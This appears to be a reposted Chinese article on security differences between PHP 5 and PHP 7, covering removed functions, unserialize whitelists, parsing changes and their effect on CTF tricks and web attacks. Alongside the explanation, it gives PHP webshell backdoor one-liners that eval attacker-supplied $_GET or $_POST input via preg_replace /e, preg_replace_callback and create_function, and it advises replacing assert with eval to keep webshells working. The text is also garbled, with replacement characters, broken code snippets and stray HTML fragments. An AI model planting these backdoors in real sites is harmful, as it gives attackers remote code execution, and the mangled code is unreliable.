函數修改
preg_replace()不再支持/e修飾符
?php preg_replace( /.*/e ,$_GET[ h ], . ?
利用e修飾符執行代碼的后門大家也用了不少了�����,具體看官方的這段描述:
如果設置了這個被棄用的修飾符��, preg_replace() 在進行了對替換字符串的 后向引用替換之后, 將替換后的字符串作為php 代碼評估執行(eval 函數方式)��,并使用執行結果 作為實際參與替換的字符串�。單引號、雙引號���、反斜線()和 NULL 字符在 后向引用替換時會被用反斜線轉義.
很不幸���,在PHP7以上版本不在支持e修飾符,同時官方給了我們一個新的函數preg_replace_callback:
這里我們稍微改動一下就可以利用它當我們的后門:
?php preg_replace_callback( /.*/ ,function ($a){@eval($a[0]);},$_GET[ h ]); ? 
create_function()被廢棄
?php $func =create_function( ,$_POST[ cmd $func(); ?
少了一種可以利用當后門的函數�,實際上它是通過執行eval實現的?����?捎锌蔁o。
mysql_*系列全員移除
如果你要在PHP7上面用老版本的mysql_*系列函數需要你自己去額外裝了���,官方不在自帶����,現在官方推薦的是mysqli或者pdo_mysql�。這是否預示著未來SQL注入漏洞在PHP上的大幅減少呢~
我已經很久沒在目標站上挖到過sql注入了,全都是預編譯�����!
unserialize()增加一個可選白名單參數
$data = unserialize($serializedObj1 , [ allowed_html' target='_blank'>classes = true]);$data2 = unserialize($serializedObj2 , [ allowed_classes = [ MyClass1 , MyClass2 ]]);
其實就是一個白名單����,如果反序列數據里面的類名不在這個白名單內,就會報錯�����。
像這樣的報錯��!
可以是類名也可以是布爾數據�����,如果是FALSE就會將所有的對象都轉換為__PHP_Incomplete_Class對象��。TRUE是無限制��。也可以傳入類名實現白名單���。
還好現在是可選不是必選����,要是默認FALSE逼程序員弄白名單那就真的吐血了�。
assert()默認不在可以執行代碼
這就是眾多馬不能用的罪魁禍首了,太多的馬用assert()來執行代碼了�,這個更新基本就團滅,一般情況下修改成eval即可正常運行了~
語法修改
foreach不再改變內部數組指針
?php $a = array( 1 , 2 , 3 foreach ($a as $k= $n){ echo print_r($a); foreach ($a as $k= $n){ echo print_r($a); 這樣的代碼在php5中�,是這樣的執行結果:
因為數組最后一個元素的 $value 引用在 foreach 循環之后仍會保留,在第二個循環的時候實際上是對之前的指針不斷的賦值�。php7中通過值遍歷時,操作的值為數組的副本���,不在對后續操作進行影響��。
這個改動影響了某些cms的洞在PHP7上無法利用了….你知道我指的是哪個洞的�����。
這個問題在PHP7.0.0以后的版本又被改回去了���,只影響這一個版本��。
8進制字符容錯率降低
在php5版本����,如果一個八進制字符如果含有無效數字��,該無效數字將被靜默刪節�����。
?php echo octdec( 012999999999999 ) . echo octdec( 012 ) . if (octdec( 012999999999999 )==octdec( 012 )){ echo : ) . } 比如這樣的代碼在php5中的執行結果如下:
但是在php7里面會觸發一個解析錯誤��。
這個問題同樣在PHP7.0.0以后的版本又被改回去了��,只影響這一個版本�����。
十六進制字符串不再被認為是數字
這個修改一出���,以后CTF套路會少很多啊~
很多騷操作都不能用了~
這個沒什么好說的���,大家都懂。
?php var_dump( 0x123 == 291 var_dump(is_numeric( 0x123 ));var_dump( 0xe + 0x1 var_dump(substr( foo , 0x1 )); ?
以上代碼在PHP5運行結果如下:
PHP7運行結果如下:
你以為我要說這個在后續版本被改回去了���?不���,目前截至最新的PHP7.3版本依然沒有改回去的征兆,官方稱不會在改了��。這個講道理還是蠻傷的�����。
移除了 ASP 和 script PHP 標簽
現在只有 ?php ? 這樣的標簽能在php7上運行了��。
字面意思�����,影響其實不是很大(只是以后騷套路會少一點)����。
超大浮點數類型轉換截斷
將浮點數轉換為整數的時候����,如果浮點數值太大��,導致無法以整數表達的情況下��, 在PHP5的版本中��,轉換會直接將整數截斷�,并不會引發錯誤。 在PHP7中����,會報錯。
CTF又少一個出題套路����,這個問題我只在CTF上見過,影響應該不大�。
雜項
exec(), system() passthru()函數對 NULL 增加了保護.list()不再能解開字符串string變量$HTTP_RAW_POST_DATA 被移除__autoload() 方法被廢棄parse_str() 不加第二個參數會直接把字符串導入當前的符號表,如果加了就會轉換稱一個數組?����,F在是第二個參數是強行選項了。統一不同平臺下的整型長度session_start() 可以加入一個數組覆蓋php.ini的配置
相關推薦:《PHP教程》
本篇文章就是關于PHP7和PHP5在安全上的區別介紹����,希望對需要的朋友有所幫助��!
以上就是PHP7和PHP5在安全上的區別(實例)的詳細內容���,PHP教程
鄭重聲明:本文版權歸原作者所有�����,轉載文章僅為傳播更多信息之目的���,如作者信息標記有誤,請第一時間聯系我們修改或刪除���,多謝���。
